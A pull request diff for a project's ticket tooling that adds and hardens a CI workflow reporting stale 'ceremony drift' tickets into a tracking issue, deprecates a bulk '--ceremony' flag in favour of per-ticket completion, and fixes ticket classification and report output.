### PR TITLE
feat(ci): report ceremony drift into a tracking issue (#203)

### DIFF
--- a/.github/workflows/ceremony-drift.yml
+++ b/.github/workflows/ceremony-drift.yml
@@ -41,7 +41,18 @@ jobs:
       - name: Checkout
         uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
         with:
-          fetch-depth: 0 # full history so the base ref resolves
+          # ALWAYS main, for every trigger. workflow_dispatch can be launched
+          # against any branch or tag, and checkout defaults to the triggering
+          # ref — which would load that branch's ticket store while the tracker
+          # being rewritten is repository-wide. Someone dispatching from a
+          # feature branch could then close or rewrite the authoritative issue
+          # from a non-authoritative snapshot.
+          ref: main
+          fetch-depth: 0 # full history so scope-vs-tracked-files resolves
+          # Do NOT leave the job's issues:write token in .git/config. Anything
+          # that runs later in the job (notably dependency install scripts) could
+          # otherwise recover it and mutate issues as github-actions[bot].
+          persist-credentials: false
 
       - name: Setup Node.js
         uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
@@ -49,15 +60,19 @@ jobs:
           node-version: 20
 
       - name: Install
-        run: npm install # links @adlc/core and @adlc/tickets workspaces
-
-      - name: Fetch base ref
-        # Explicit refspec so origin/main exists as a remote-tracking ref the
-        # drift detector can resolve (mirrors the rails-guard job).
-        run: git fetch --no-tags origin "main:refs/remotes/origin/main"
+        # `ci` for a lockfile-exact tree, `--ignore-scripts` so no dependency
+        # lifecycle script executes in a job that holds issues:write. The five
+        # packages in this lockfile with install scripts (esbuild, sharp,
+        # protobufjs, ...) are not needed here: this job only imports
+        # @adlc/core and @adlc/tickets, which npm links itself without scripts.
+        run: npm ci --ignore-scripts
 
       - name: Report ceremony drift
         env:
+          # The ONLY step given the token. Nothing before it can reach one.
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-          BASE_REF: origin/main
+          # HEAD *is* main here (checkout is pinned above), so drift is computed
+          # against exactly the snapshot that was checked out — no mixing a
+          # branch ticket store with a main base ref.
+          BASE_REF: HEAD
         run: node scripts/ceremony-drift.mjs

--- a/.github/workflows/ceremony-drift.yml
+++ b/.github/workflows/ceremony-drift.yml
@@ -1,0 +1,63 @@
+# Ceremony drift — surface shipped tickets whose rails never expired.
+#
+# A ticket that ships while freezing rails must be marked `completed: true` for
+# its rails to expire (T36). Nothing performed or surfaced that step, so drift
+# accumulated silently and stale rails kept freezing unrelated future work (the
+# failure that blocked PR #196). `ticket-prune` made the drift visible and gave
+# it a remedy; this closes the loop so detection no longer depends on someone
+# remembering to look.
+#
+# DELIBERATELY NOT A BLOCKING GATE, and not run on pull_request. An ordinary PR
+# structurally cannot clear this set — rails-guard-ci's
+# assertBaseTicketContractsPreserved denies field changes to existing base
+# tickets — so a PR-level failure would block every contributor on drift none of
+# them can fix, and people would learn to route around it. This reports into a
+# tracking issue and always exits 0. Authoritative rail enforcement stays in the
+# `rails-guard` job in ci.yml.
+name: Ceremony drift
+
+on:
+  push:
+    branches: [main] # drift can only change when something merges
+  schedule:
+    - cron: '17 13 * * *' # daily safety net; off the hour to dodge peak contention
+  workflow_dispatch: # so an operator can re-check right after running the sweep
+
+permissions:
+  contents: read
+  issues: write # the job's only side effect: maintaining its tracking issue
+
+# The push and schedule triggers can overlap. Without this, two runs could each
+# see "no existing issue" and open a duplicate. Queue instead of cancelling —
+# a cancelled run might drop a close-on-clear.
+concurrency:
+  group: ceremony-drift
+  cancel-in-progress: false
+
+jobs:
+  ceremony-drift:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
+        with:
+          fetch-depth: 0 # full history so the base ref resolves
+
+      - name: Setup Node.js
+        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
+        with:
+          node-version: 20
+
+      - name: Install
+        run: npm install # links @adlc/core and @adlc/tickets workspaces
+
+      - name: Fetch base ref
+        # Explicit refspec so origin/main exists as a remote-tracking ref the
+        # drift detector can resolve (mirrors the rails-guard job).
+        run: git fetch --no-tags origin "main:refs/remotes/origin/main"
+
+      - name: Report ceremony drift
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          BASE_REF: origin/main
+        run: node scripts/ceremony-drift.mjs

--- a/docs/specs/ticket-completion-rail-cleanup.md
+++ b/docs/specs/ticket-completion-rail-cleanup.md
@@ -36,12 +36,16 @@ someone tries to write, and there is **no command to apply the ceremony**.
   (bin exits non-zero) unless `ADLC_RAILS_BYPASS=1` is set. Verified by a
   `packages/ticket-prune/test/run.test.mjs` case that invokes `--ceremony` with the env
   unset and asserts the tickets file is byte-identical afterward.
-- **AC3 — ceremony completes railed shipped tickets, add-only.** With `ADLC_RAILS_BYPASS=1`
-  and `--ceremony --write`, each `needsCeremony` rails-freeze ticket gains exactly
-  `completed: true` (no other field changed, mirroring PR #199 — no manifest entry) and is
-  reported under `ceremonyCompleted`; a still-active railed ticket (scope not shipped) is
-  not completed. Verified by `node --test packages/ticket-prune/test/run.test.mjs` asserting
-  the resulting ticket diff is add-only and the active railed ticket is untouched.
+- **AC3 — ceremony completes railed shipped tickets, add-only.** _(Historical: this
+  verified the original `ticket-prune --ceremony --write` behavior, now DEPRECATED
+  in favor of per-ticket `adlc ticket complete <id> --write --authorize --json` —
+  see #208. Completion of a railed shipped ticket still produces the add-only
+  `completed: true` diff; it is now performed per-ticket and records manifest
+  evidence, rather than in a bulk pass.)_ With `ADLC_RAILS_BYPASS=1` and
+  `--ceremony --write`, each `needsCeremony` rails-freeze ticket gained exactly
+  `completed: true` (no other field changed, mirroring PR #199) and was reported
+  under `ceremonyCompleted`; a still-active railed ticket (scope not shipped) was
+  not completed.
 - **AC4 — rails expire after completion (T36).** After the ceremony completes a railed
   ticket, the rails-guard base-rail union (the `t.completed === true` skip) no longer
   includes that ticket's rails. Verified by a `packages/ticket-prune/test/run.test.mjs` case
@@ -83,11 +87,15 @@ protected-base admin checkout of `main`** (this cannot land in an ordinary PR):
 
 ```sh
 # Review first:
-node packages/ticket-prune/bin/ticket-prune.mjs --json --base-ref origin/main   # inspect needsCeremony
+adlc ticket-prune --json --base-ref origin/main   # inspect needsCeremony
 
-# Apply the ceremony (admin override recorded), then push directly to main:
-ADLC_RAILS_BYPASS=1 node packages/ticket-prune/bin/ticket-prune.mjs --ceremony --base-ref origin/main
+# Then complete each confirmed-shipped id individually and push directly to main.
+# Per-ticket (no bulk recompute), records manifest evidence, both backends:
+adlc ticket complete <id> --write --authorize --json
 ```
+
+_(The original one-time sweep used the now-deprecated bulk `ticket-prune
+--ceremony`; #208. The per-ticket command above is the current path.)_
 
 Each completed ticket's rails then auto-expire per T36, unfreezing their paths for future
 PRs. Confirm any ticket that is genuinely still in flight is excluded before pushing — the

--- a/docs/specs/ticket-completion-rail-cleanup.md
+++ b/docs/specs/ticket-completion-rail-cleanup.md
@@ -86,7 +86,7 @@ protected-base admin checkout of `main`** (this cannot land in an ordinary PR):
 node packages/ticket-prune/bin/ticket-prune.mjs --json --base-ref origin/main   # inspect needsCeremony
 
 # Apply the ceremony (admin override recorded), then push directly to main:
-ADLC_RAILS_BYPASS=1 node packages/ticket-prune/bin/ticket-prune.mjs --ceremony --write --base-ref origin/main
+ADLC_RAILS_BYPASS=1 node packages/ticket-prune/bin/ticket-prune.mjs --ceremony --base-ref origin/main
 ```
 
 Each completed ticket's rails then auto-expire per T36, unfreezing their paths for future

--- a/docs/tools/ticket-prune.md
+++ b/docs/tools/ticket-prune.md
@@ -18,7 +18,7 @@ Addresses [issue #39](https://github.com/voodootikigod/adlc/issues/39).
 ## Usage
 
 ```
-ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]
+ticket-prune [--tickets path] [--base-ref ref] [--write] [--json]
 ```
 
 Dry-run by default, consistent with every other ADLC writer (`skill-rot`,
@@ -46,20 +46,28 @@ reported — **in dry-run as well as write** (#198) — under `needsCeremony` wi
 `blocker: "rails-freeze"`, so the drift is visible before it blocks a PR rather
 than only when you try to write.
 
-## The rail-cleanup ceremony (`--ceremony`, admin-only) (#198)
+## Completing rail-freezing tickets (`--ceremony` is deprecated, #208)
 
-`--ceremony` is the protected-base admin action that completes the
-`needsCeremony` rail-freezing tickets — the one completion an ordinary PR cannot
-make. It adds `completed: true` to each in place (the same add-only edit as a
-tombstone; reported under `ceremonyCompleted`), expiring their rails per T36. It
-**refuses to write and returns an operational error unless `ADLC_RAILS_BYPASS=1`
-is set**, because the diff it produces is deliberately one the ordinary rails-guard
-PR gate denies — it only lands via the protected-base/admin path (as the manual
-sweep in PR #199 did by hand). Only the `rails-freeze` blocker is completed; a
-rails-less `preexisting-completed-field` ticket (one already carrying a
-`completed` field) would need a field *mutation*, a distinct riskier operation
-left out of scope and still only reported. Combine with `--write` to tombstone the
-rails-less stale tickets and complete the rail-freezing ones in a single pass.
+Rail-freezing tickets in `needsCeremony` are the one completion an ordinary PR
+cannot make (the diff expires rails, which `rails-guard-ci` denies for a base
+ticket). Complete them on a protected-base checkout of `main`, **one id at a
+time**, with the canonical command:
+
+```bash
+adlc ticket complete <id> --write --authorize --json
+```
+
+Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes through
+the ticket-store transaction (worktree lock + expected-snapshot CAS), records
+completion evidence to `.adlc/manifest.jsonl`, and works on both the legacy and
+directory stores. A `preexisting-completed-field` ticket carries a `completed`
+value someone set on purpose — it stays reported, not overwritten.
+
+`ticket-prune --ceremony` used to do this as a bulk pass, but it took no ids and
+recomputed its target set at run time (a TOCTOU window and no per-ticket filter),
+wrote without recording manifest evidence, and had no directory-store support. It
+is **deprecated (#208)**: invoking it now fails closed and redirects to the
+command above.
 
 ## How "stale" is decided
 
@@ -101,7 +109,7 @@ matching, and is exactly the check the issue's worked example did by hand.
 | `--archive <path>` | Legacy-backend archive override. Sharded stores always use `.adlc/ticket-archive/`. |
 | `--base-ref <ref>` | Git ref to check declared `scope` globs against (default `HEAD`). Point at `origin/main` to audit a feature branch's tickets against what's already shipped on trunk. |
 | `--write` | Tombstone rails-less stale tickets: add `completed: true` in place (never remove, never mutate any other field). Rails-freezing stale tickets are left untouched and reported under `needsCeremony`. |
-| `--ceremony` | Protected-base admin action: also complete the rail-freezing stale tickets in place (expiring their rails, T36), reported under `ceremonyCompleted`. Writes nothing unless `ADLC_RAILS_BYPASS=1` is set. |
+| `--ceremony` | **Deprecated (#208).** Fails closed and redirects to `adlc ticket complete <id> --write --authorize --json`. Rail-freezing tickets are completed per-ticket via that command, not in bulk here. |
 | `--json` | Machine-readable `{ baseRef, write, ceremony, stale[], active[], tombstoned[], ceremonyCompleted[], needsCeremony[] }`. |
 
 ## Exit codes
@@ -109,7 +117,7 @@ matching, and is exactly the check the issue's worked example did by hand.
 | Code | Meaning |
 |------|---------|
 | `0` | Report or tombstone succeeded — regardless of how many stale tickets were found. This is advisory (like `model-ratchet`), not a pass/fail gate: stale tickets are clutter, not a merge blocker. |
-| `1` | Operational error — bad/missing ticket file, invalid JSON, unresolvable `--base-ref`, the write lock could not be acquired, or `--ceremony` was invoked without `ADLC_RAILS_BYPASS=1`. |
+| `1` | Operational error — bad/missing ticket file, invalid JSON, unresolvable `--base-ref`, the write lock could not be acquired, or the deprecated `--ceremony` was invoked (it redirects). |
 
 ## Examples
 
@@ -123,11 +131,10 @@ ticket-prune --base-ref origin/main --json
 # Tombstone the rails-less stale tickets found above (completed:true in place)
 ticket-prune --write
 
-# Admin, on a protected-base checkout of main: complete the rail-freezing
-# shipped tickets, expiring their rails (T36). Refuses without the override.
-# NOT --write: that would ALSO tombstone the rails-less stale tickets in the
-# same run. Keep the two operations separate so each write set is reviewed.
-ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --base-ref origin/main
+# Admin, on a protected-base checkout of main: complete a rail-freezing shipped
+# ticket, expiring its rails (T36). Per-ticket, records manifest evidence, both
+# backends. (ticket-prune --ceremony is deprecated — see #208.)
+adlc ticket complete <id> --write --authorize --json
 ```
 
 ## Locking and atomicity

--- a/docs/tools/ticket-prune.md
+++ b/docs/tools/ticket-prune.md
@@ -124,8 +124,10 @@ ticket-prune --base-ref origin/main --json
 ticket-prune --write
 
 # Admin, on a protected-base checkout of main: complete the rail-freezing
-# shipped tickets too, expiring their rails (T36). Refuses without the override.
-ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --write --base-ref origin/main
+# shipped tickets, expiring their rails (T36). Refuses without the override.
+# NOT --write: that would ALSO tombstone the rails-less stale tickets in the
+# same run. Keep the two operations separate so each write set is reviewed.
+ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --base-ref origin/main
 ```
 
 ## Locking and atomicity

--- a/docs/tools/ticket-prune.md
+++ b/docs/tools/ticket-prune.md
@@ -57,7 +57,7 @@ time**, with the canonical command:
 adlc ticket complete <id> --write --authorize --json
 ```
 
-Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes through
+Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes through
 the ticket-store transaction (worktree lock + expected-snapshot CAS), records
 completion evidence to `.adlc/manifest.jsonl`, and works on both the legacy and
 directory stores. A `preexisting-completed-field` ticket carries a `completed`

--- a/packages/ticket-prune/README.md
+++ b/packages/ticket-prune/README.md
@@ -13,7 +13,7 @@ Addresses [issue #39](https://github.com/voodootikigod/adlc/issues/39).
 ## Usage
 
 ```
-ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]
+ticket-prune [--tickets path] [--base-ref ref] [--write] [--json]
 ```
 
 Dry-run by default, consistent with every other ADLC writer (`skill-rot`,
@@ -41,20 +41,28 @@ reported — **in dry-run as well as write** (#198) — under `needsCeremony` wi
 `blocker: "rails-freeze"`, so the drift is visible before it blocks a PR rather
 than only when you try to write.
 
-## The rail-cleanup ceremony (`--ceremony`, admin-only) (#198)
+## Completing rail-freezing tickets (`--ceremony` is deprecated, #208)
 
-`--ceremony` is the protected-base admin action that completes the
-`needsCeremony` rail-freezing tickets — the one completion an ordinary PR cannot
-make. It adds `completed: true` to each in place (the same add-only edit as a
-tombstone; reported under `ceremonyCompleted`), expiring their rails per T36. It
-**refuses to write and returns an operational error unless `ADLC_RAILS_BYPASS=1`
-is set**, because the diff it produces is deliberately one the ordinary rails-guard
-PR gate denies — it only lands via the protected-base/admin path (as the manual
-sweep in PR #199 did by hand). Only the `rails-freeze` blocker is completed; a
-rails-less `preexisting-completed-field` ticket (one already carrying a
-`completed` field) would need a field *mutation*, a distinct riskier operation
-left out of scope and still only reported. Combine with `--write` to tombstone the
-rails-less stale tickets and complete the rail-freezing ones in a single pass.
+Rail-freezing tickets in `needsCeremony` are the one completion an ordinary PR
+cannot make (the diff expires rails, which `rails-guard-ci` denies for a base
+ticket). Complete them on a protected-base checkout of `main`, **one id at a
+time**, with the canonical command:
+
+```bash
+adlc ticket complete <id> --write --authorize --json
+```
+
+Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes through
+the ticket-store transaction (worktree lock + expected-snapshot CAS), records
+completion evidence to `.adlc/manifest.jsonl`, and works on both the legacy and
+directory stores. A `preexisting-completed-field` ticket carries a `completed`
+value someone set on purpose — it stays reported, not overwritten.
+
+`ticket-prune --ceremony` used to do this as a bulk pass, but it took no ids and
+recomputed its target set at run time (a TOCTOU window and no per-ticket filter),
+wrote without recording manifest evidence, and had no directory-store support. It
+is **deprecated (#208)**: invoking it now fails closed and redirects to the
+command above.
 
 ## How "stale" is decided
 
@@ -96,7 +104,7 @@ matching, and is exactly the check the issue's worked example did by hand.
 | `--archive <path>` | Legacy-backend archive override. Sharded stores always use `.adlc/ticket-archive/`. |
 | `--base-ref <ref>` | Git ref to check declared `scope` globs against (default `HEAD`). Point at `origin/main` to audit a feature branch's tickets against what's already shipped on trunk. |
 | `--write` | Tombstone rails-less stale tickets: add `completed: true` in place (never remove, never mutate any other field). Rails-freezing stale tickets are left untouched and reported under `needsCeremony`. |
-| `--ceremony` | Protected-base admin action: also complete the rail-freezing stale tickets in place (expiring their rails, T36), reported under `ceremonyCompleted`. Writes nothing unless `ADLC_RAILS_BYPASS=1` is set. |
+| `--ceremony` | **Deprecated (#208).** Fails closed and redirects to `adlc ticket complete <id> --write --authorize --json`. Rail-freezing tickets are completed per-ticket via that command, not in bulk here. |
 | `--json` | Machine-readable `{ baseRef, write, ceremony, stale[], active[], tombstoned[], ceremonyCompleted[], needsCeremony[] }`. |
 
 ## Exit codes
@@ -104,7 +112,7 @@ matching, and is exactly the check the issue's worked example did by hand.
 | Code | Meaning |
 |------|---------|
 | `0` | Report or tombstone succeeded — regardless of how many stale tickets were found. This is advisory (like `model-ratchet`), not a pass/fail gate: stale tickets are clutter, not a merge blocker. |
-| `1` | Operational error — bad/missing ticket file, invalid JSON, unresolvable `--base-ref`, the write lock could not be acquired, or `--ceremony` was invoked without `ADLC_RAILS_BYPASS=1`. |
+| `1` | Operational error — bad/missing ticket file, invalid JSON, unresolvable `--base-ref`, the write lock could not be acquired, or the deprecated `--ceremony` was invoked (it redirects). |
 
 ## Examples
 
@@ -118,11 +126,10 @@ ticket-prune --base-ref origin/main --json
 # Tombstone the rails-less stale tickets found above (completed:true in place)
 ticket-prune --write
 
-# Admin, on a protected-base checkout of main: complete the rail-freezing
-# shipped tickets, expiring their rails (T36). Refuses without the override.
-# NOT --write: that would ALSO tombstone the rails-less stale tickets in the
-# same run. Keep the two operations separate so each write set is reviewed.
-ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --base-ref origin/main
+# Admin, on a protected-base checkout of main: complete a rail-freezing shipped
+# ticket, expiring its rails (T36). Per-ticket, records manifest evidence, both
+# backends. (ticket-prune --ceremony is deprecated — see #208.)
+adlc ticket complete <id> --write --authorize --json
 ```
 
 ## Locking and atomicity

--- a/packages/ticket-prune/README.md
+++ b/packages/ticket-prune/README.md
@@ -119,8 +119,10 @@ ticket-prune --base-ref origin/main --json
 ticket-prune --write
 
 # Admin, on a protected-base checkout of main: complete the rail-freezing
-# shipped tickets too, expiring their rails (T36). Refuses without the override.
-ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --write --base-ref origin/main
+# shipped tickets, expiring their rails (T36). Refuses without the override.
+# NOT --write: that would ALSO tombstone the rails-less stale tickets in the
+# same run. Keep the two operations separate so each write set is reviewed.
+ADLC_RAILS_BYPASS=1 ticket-prune --ceremony --base-ref origin/main
 ```
 
 ## Locking and atomicity

--- a/packages/ticket-prune/README.md
+++ b/packages/ticket-prune/README.md
@@ -52,7 +52,7 @@ time**, with the canonical command:
 adlc ticket complete <id> --write --authorize --json
 ```
 
-Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes through
+Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes through
 the ticket-store transaction (worktree lock + expected-snapshot CAS), records
 completion evidence to `.adlc/manifest.jsonl`, and works on both the legacy and
 directory stores. A `preexisting-completed-field` ticket carries a `completed`

--- a/packages/ticket-prune/bin/ticket-prune.mjs
+++ b/packages/ticket-prune/bin/ticket-prune.mjs
@@ -5,20 +5,22 @@
 // tombstoned by adding `completed: true` in place (never removed) — the exact
 // annotation the rails-guard CI gate accepts for a rails-less ticket, so the
 // pruned tickets.json merges through an ordinary PR. Stale tickets that still
-// freeze rails are reported as needing the protected-base admin ceremony (a
-// completion there also expires the rails, which the gate reserves for admins).
+// freeze rails (or already carry a `completed` field) are only REPORTED, under
+// needsCeremony — complete them individually with the canonical command below.
 //
-// Usage: ticket-prune [--tickets path] [--base-ref ref] [--write] [--ceremony] [--json]
+// Usage: ticket-prune [--tickets path] [--base-ref ref] [--write] [--json]
 //
 // This is advisory (like model-ratchet), not a pass/fail gate: stale tickets
 // are clutter, not a merge blocker. Exit codes: 0 = report/write succeeded
 // (regardless of how many stale tickets were found), 1 = operational error
-// (including --ceremony without ADLC_RAILS_BYPASS=1).
+// (including the deprecated --ceremony, see below).
 //
-// --ceremony is the protected-base admin action that completes rail-freezing
-// shipped tickets (expiring their rails, T36) — the one completion an ordinary
-// PR cannot make. It writes nothing unless ADLC_RAILS_BYPASS=1 is set, because
-// its output only lands via the protected-base/admin path.
+// --ceremony is DEPRECATED (#208). It was a bulk, evidence-less, legacy-store-only
+// completion of rail-freezing tickets; invoking it now fails closed and redirects
+// to the canonical per-ticket path:
+//   adlc ticket complete <id> --write --authorize --json
+// (per-ticket — no TOCTOU, records manifest evidence, works on both backends).
+// The flag is still accepted only so the redirect fires instead of "unknown flag".
 
 import { parseArgs, opError, printJson } from '@adlc/core';
 import { runTicketPrune } from '../lib/run.mjs';

--- a/packages/ticket-prune/bin/ticket-prune.mjs
+++ b/packages/ticket-prune/bin/ticket-prune.mjs
@@ -48,6 +48,16 @@ const result = runTicketPrune({
 });
 
 if (!result.ok) {
+  // A directory --write batch that fails mid-way returns what already committed
+  // (archived) and which id failed, so the operator can recover instead of
+  // guessing. Surface that structured data BEFORE exiting non-zero — dropping it
+  // would defeat the partial-batch reporting the writer produces.
+  if (values.json && (result.archived?.length || result.failedId)) {
+    printJson({ ok: false, error: result.error, archived: result.archived ?? [], failedId: result.failedId ?? null });
+  } else if (result.archived?.length) {
+    console.error(`partially applied before the failure — archived: ${result.archived.map((a) => a?.id ?? a).join(', ')}` +
+      (result.failedId ? `; failed on: ${result.failedId}` : ''));
+  }
   opError(result.error);
 }
 

--- a/packages/ticket-prune/lib/detect.mjs
+++ b/packages/ticket-prune/lib/detect.mjs
@@ -131,11 +131,19 @@ export function classifyTickets(tickets, trackedFiles) {
 export function ceremonyDisposition(ticket, reason) {
   if (ticket.completed === true) return { disposition: 'done' };
   const rails = Array.isArray(ticket.rails) ? ticket.rails : [];
-  if (rails.length > 0) {
-    return { disposition: 'ceremony', entry: { id: ticket.id, reason, rails, blocker: 'rails-freeze' } };
-  }
+  // A `completed` field that is PRESENT but not `true` (e.g. deliberately
+  // `false` to keep rails frozen during follow-up work) is a value someone set
+  // on purpose. It must route to manual review — 'preexisting-completed-field' —
+  // BEFORE the rails check, not after. Otherwise a railed `completed: false`
+  // ticket is classified 'rails-freeze', and the reporter would advertise a
+  // completion command that overwrites the deliberate value with `true` and
+  // expires its rails. The blocker carries the rails so the report still shows
+  // them; it is simply never presented as safe to bulk-complete.
   if (Object.prototype.hasOwnProperty.call(ticket, 'completed')) {
     return { disposition: 'ceremony', entry: { id: ticket.id, reason, rails, blocker: 'preexisting-completed-field' } };
+  }
+  if (rails.length > 0) {
+    return { disposition: 'ceremony', entry: { id: ticket.id, reason, rails, blocker: 'rails-freeze' } };
   }
   return { disposition: 'tombstone' };
 }

--- a/packages/ticket-prune/lib/format.mjs
+++ b/packages/ticket-prune/lib/format.mjs
@@ -1,7 +1,7 @@
 // format.mjs — human-readable + JSON rendering for a runTicketPrune() result.
 
 export function renderReport(result) {
-  const { baseRef, write, stale, active, tombstoned = [], needsCeremony = [] } = result;
+  const { baseRef, write, stale, active, tombstoned = [], archived = [], needsCeremony = [] } = result;
   const lines = [];
   // `--ceremony` is deprecated (#208) and returns before rendering, so the only
   // in-place write this tool reports is tombstoning under --write.
@@ -10,11 +10,20 @@ export function renderReport(result) {
   lines.push('');
 
   if (write) {
-    if (tombstoned.length === 0) {
-      lines.push('No stale tickets tombstoned.');
-    } else {
+    // Legacy stores tombstone (completed:true in place); directory stores archive
+    // (move the shard). Surface BOTH — an archived ticket is removed from the
+    // active store, so omitting it would let output claim "nothing changed" after
+    // a real mutation.
+    if (tombstoned.length === 0 && archived.length === 0) {
+      lines.push('No stale tickets tombstoned or archived.');
+    }
+    if (tombstoned.length > 0) {
       lines.push(`Tombstoned ${tombstoned.length} rails-less stale ticket(s) with completed:true in place:`);
       for (const t of tombstoned) lines.push(`  - ${t.id}: ${t.reason}`);
+    }
+    if (archived.length > 0) {
+      lines.push(`Archived ${archived.length} rails-less stale ticket(s) out of the active directory store:`);
+      for (const a of archived) lines.push(`  - ${a?.id ?? a}`);
     }
   } else if (stale.length === 0) {
     lines.push('No stale tickets found.');
@@ -59,6 +68,8 @@ export function renderReport(result) {
 }
 
 export function toJson(result) {
-  const { baseRef, write, ceremony = false, stale, active, tombstoned = [], ceremonyCompleted = [], needsCeremony = [] } = result;
-  return { baseRef, write, ceremony, stale, active, tombstoned, ceremonyCompleted, needsCeremony };
+  const { baseRef, write, ceremony = false, stale, active, tombstoned = [], archived = [], ceremonyCompleted = [], needsCeremony = [] } = result;
+  // `archived` is the directory-store mutation (moved shards); omitting it would
+  // make `--json` under-report what --write actually changed on that backend.
+  return { baseRef, write, ceremony, stale, active, tombstoned, archived, ceremonyCompleted, needsCeremony };
 }

--- a/packages/ticket-prune/lib/format.mjs
+++ b/packages/ticket-prune/lib/format.mjs
@@ -23,19 +23,28 @@ export function renderReport(result) {
     for (const r of stale) lines.push(`  - ${r.id}: ${r.reason}`);
   }
 
-  if (needsCeremony.length > 0) {
+  const railsFreeze = needsCeremony.filter((t) => t.blocker === 'rails-freeze');
+  const manual = needsCeremony.filter((t) => t.blocker !== 'rails-freeze');
+
+  if (railsFreeze.length > 0) {
     lines.push('');
     lines.push(
-      `Stale but not auto-tombstonable — complete each per-ticket on the protected-base ` +
-        `path with \`adlc ticket complete <id> --write --authorize --json\` (${needsCeremony.length}):`,
+      `Shipped but still freezing rails — complete each per-ticket on the protected-base ` +
+        `path with \`adlc ticket complete <id> --write --authorize --json\` (${railsFreeze.length}):`,
     );
-    for (const t of needsCeremony) {
-      const detail =
-        t.blocker === 'rails-freeze'
-          ? `freezes: ${t.rails.join(', ')}`
-          : 'already has a completed field';
-      lines.push(`  - ${t.id}: ${t.reason} [${detail}]`);
-    }
+    for (const t of railsFreeze) lines.push(`  - ${t.id}: ${t.reason} [freezes: ${t.rails.join(', ')}]`);
+  }
+
+  if (manual.length > 0) {
+    // These carry a `completed` value set on purpose. `adlc ticket complete` would
+    // OVERWRITE it — so do NOT advertise the command for them; they need a human
+    // decision, not a mechanical completion (mirrors the drift reporter).
+    lines.push('');
+    lines.push(
+      `Already carry a \`completed\` field (someone set it) — needs a manual decision, ` +
+        `NOT \`adlc ticket complete\` (which would overwrite it) (${manual.length}):`,
+    );
+    for (const t of manual) lines.push(`  - ${t.id}: ${t.reason}`);
   }
 
   lines.push('');

--- a/packages/ticket-prune/lib/format.mjs
+++ b/packages/ticket-prune/lib/format.mjs
@@ -1,23 +1,20 @@
 // format.mjs — human-readable + JSON rendering for a runTicketPrune() result.
 
 export function renderReport(result) {
-  const { baseRef, write, ceremony, stale, active, tombstoned = [], ceremonyCompleted = [], needsCeremony = [] } = result;
+  const { baseRef, write, stale, active, tombstoned = [], needsCeremony = [] } = result;
   const lines = [];
-  const mode = ceremony ? (write ? 'write+ceremony' : 'ceremony') : write ? 'write' : 'dry-run';
+  // `--ceremony` is deprecated (#208) and returns before rendering, so the only
+  // in-place write this tool reports is tombstoning under --write.
+  const mode = write ? 'write' : 'dry-run';
   lines.push(`ticket-prune — base ref: ${baseRef} (${mode})`);
   lines.push('');
 
-  if (write || ceremony) {
+  if (write) {
     if (tombstoned.length === 0) {
       lines.push('No stale tickets tombstoned.');
     } else {
       lines.push(`Tombstoned ${tombstoned.length} rails-less stale ticket(s) with completed:true in place:`);
       for (const t of tombstoned) lines.push(`  - ${t.id}: ${t.reason}`);
-    }
-    if (ceremonyCompleted.length > 0) {
-      lines.push('');
-      lines.push(`Completed ${ceremonyCompleted.length} rail-freezing ticket(s) via the admin ceremony (rails now expire, T36):`);
-      for (const t of ceremonyCompleted) lines.push(`  - ${t.id}: freezes ${t.rails.join(', ')}`);
     }
   } else if (stale.length === 0) {
     lines.push('No stale tickets found.');
@@ -29,7 +26,8 @@ export function renderReport(result) {
   if (needsCeremony.length > 0) {
     lines.push('');
     lines.push(
-      `Stale but not auto-tombstonable — needs the protected-base admin ceremony (${needsCeremony.length}):`,
+      `Stale but not auto-tombstonable — complete each per-ticket on the protected-base ` +
+        `path with \`adlc ticket complete <id> --write --authorize --json\` (${needsCeremony.length}):`,
     );
     for (const t of needsCeremony) {
       const detail =

--- a/packages/ticket-prune/lib/run.mjs
+++ b/packages/ticket-prune/lib/run.mjs
@@ -126,16 +126,25 @@ export function runTicketPrune(options = {}) {
     // `adlc ticket complete`, exactly as on the legacy backend.
     const archivedEntries = [];
     const needsCeremony = [];
-    try {
-      for (const item of stale) {
-        const ticket = ticketsById.get(item.id);
-        const disposition = ceremonyDisposition(ticket ?? { id: item.id }, item.reason);
+    for (const item of stale) {
+      try {
+        // Re-read and re-classify against the CURRENT snapshot, then pass THAT
+        // snapshot's hash to archiveTicket, so the disposition and the CAS come
+        // from the same view. Taking the disposition from the initial load but
+        // the hash from a later load would let a concurrent edit (rails added,
+        // status changed, completed:false set) slip a reclassified ticket through
+        // the CAS. This mirrors the legacy path's under-lock re-read.
+        const current = canonicalStore.load();
+        const ticket = current.get(item.id);
+        if (!ticket) continue; // vanished under us since the first pass
+        const reclassified = classifyTicket(ticket, trackedFiles);
+        if (!reclassified.stale) continue; // un-staled since the first pass
+        const disposition = ceremonyDisposition(ticket, reclassified.reason);
         if (disposition.disposition === 'done') continue;
         if (disposition.disposition === 'ceremony') {
           needsCeremony.push(disposition.entry); // rails-freeze / preexisting-completed-field → reported, not archived
           continue;
         }
-        const current = canonicalStore.load();
         const result = archiveTicket(canonicalStore, resolve(cwd, '.adlc/ticket-archive'), item.id, {
           root: cwd,
           expectedSnapshotHash: current.hash,
@@ -143,11 +152,15 @@ export function runTicketPrune(options = {}) {
           authorized: true,
         });
         archivedEntries.push(result.archived);
